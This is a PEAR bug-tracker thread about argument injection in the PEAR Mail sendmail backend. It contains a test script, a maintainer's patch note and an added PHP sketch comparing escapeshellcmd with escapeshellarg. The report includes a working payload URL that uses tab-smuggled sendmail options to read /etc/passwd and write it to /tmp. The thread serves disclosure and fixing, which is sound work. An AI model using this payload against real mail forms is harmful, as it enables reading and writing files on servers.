Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

ID: 16200
Updated by: daniel.oconnor@gmail.com
Reported By: root at 80sec dot com
Summary: security hole allow to read/write Arbitrary File
Status: Open
Type: Bug
Package: Mail
Operating System: linux
Package Version: 1.1.14
PHP Version: 5.2.5
Roadmap Versions:
New Comment:

Looks like this is safe on Windows.


Previous Comments:
------------------------------------------------------------------------

[2009-05-07 11:16:17] websec

Description:
------------
The Mail package used the escapeshellcmd function incorrectly, so it may
allow reading/writing arbitrary files.

Test script:
---------------
<?php
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');

require_once("Mail.php");

// Untrusted request parameter flows into the From header that is
// handed to the sendmail backend.
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subject = "subscription request";
$cc = "";   // undefined in the script as first posted
$bcc = "";  // undefined in the script as first posted
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subject,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Expected result:
----------------
this may read /etc/passwd and write it to /tmp/wokao

Actual result:
--------------
this may read /etc/passwd and write it to /tmp/wokao

------------------------------------------------------------------------


  • Daniel Oconnor at May 8, 2009 at 3:20 am
    Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

    ID: 16200
    Updated by: daniel.oconnor@gmail.com
    Reported By: root at 80sec dot com
    Summary: security hole allow to read/write Arbitrary File
    -Status: Open
    +Status: Critical
    Type: Bug
    Package: Mail
    Operating System: linux
    Package Version: 1.1.14
    PHP Version: 5.2.5
    Roadmap Versions:
    New Comment:

    -Status: Open
    +Status: Critical

    Bumping to critical for the moment.


    Previous Comments:
    ------------------------------------------------------------------------

    [2009-05-08 05:19:14] doconnor

    Looks like this is safe on Windows.

    ------------------------------------------------------------------------
  • Daniel Oconnor at May 8, 2009 at 3:38 am
    Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1

    ID: 16200
    Updated by: daniel.oconnor@gmail.com
    Reported By: root at 80sec dot com
    Summary: security hole allow to read/write Arbitrary File
    Status: Critical
    Type: Bug
    Package: Mail
    Operating System: linux
    Package Version: 1.1.14
    PHP Version: 5.2.5
    Roadmap Versions:
    New Comment:

    Above patch adds in Validate and validates the from address is a valid
    email.

    This may not be correct behaviour.
    This may also still be exploitable by targeting different arguments.


    Previous Comments:
    ------------------------------------------------------------------------

    [2009-05-08 05:36:52] doconnor

    The following patch has been added/updated:

    Patch Name: quick-fix
    Revision: 1241757412
    URL:
    http://pear.php.net/bugs/patch-display.php?bug=16200&patch=quick-fix&revision=1241757412&display=1

    ------------------------------------------------------------------------

    [2009-05-08 05:20:20] doconnor

    -Status: Open
    +Status: Critical

    Bumping to critical for the moment.

    ------------------------------------------------------------------------
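
Added example (not part of the bug report or of the PEAR Mail source): the report says escapeshellcmd() was used incorrectly, and the sketch below shows the difference by counting how many arguments /bin/sh produces when a value is appended after -f with escapeshellcmd() versus escapeshellarg(), then applies a sender check. It assumes PHP 7 or later and a POSIX /bin/sh; the helper names and the sample value are constructed for illustration.

```php
<?php
// Added illustration; argCount() and isSafeEnvelopeSender() are hypothetical helpers.

// Ask /bin/sh how many words it would pass to a program for this command tail.
// `set --` loads the words as positional parameters; `$#` is their count.
function argCount(string $tail): int
{
    return (int) shell_exec('set -- ' . $tail . '; echo $#');
}

// Second layer: refuse values that could never be a plain envelope sender.
function isSafeEnvelopeSender(string $addr): bool
{
    if ($addr === '' || $addr[0] === '-') {
        return false;               // empty, or would read as an option
    }
    if (preg_match('/[\s\x00-\x1f\x7f]/', $addr)) {
        return false;               // whitespace or control characters
    }
    return filter_var($addr, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed sample: tabs separate what the shell will treat as extra words.
$from = "alice\t--extra-option\tvalue@example.com";

// escapeshellcmd() escapes shell metacharacters such as ; | & $ but leaves
// whitespace and dashes alone, so the value still splits into several words.
$weak = '-f' . escapeshellcmd($from);

// escapeshellarg() single-quotes the whole value, so it stays one word.
$quoted = '-f' . escapeshellarg($from);

printf("escapeshellcmd: %d argument(s)\n", argCount($weak));
printf("escapeshellarg: %d argument(s)\n", argCount($quoted));

foreach (array($from, 'alice@example.com') as $candidate) {
    printf("%s => %s\n",
        json_encode($candidate),
        isSafeEnvelopeSender($candidate) ? 'accepted' : 'rejected');
}
```

Quoting the value as one argument addresses the splitting itself; the address check is a second layer, consistent with the comment in the thread that validation alone may still leave other arguments exposed.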

Discussion Overview
group: pear-bugs
categories: php
posted: May 8, '09 at 3:19a
active: May 8, '09 at 3:38a
posts: 3
users: 1
website: pear.php.net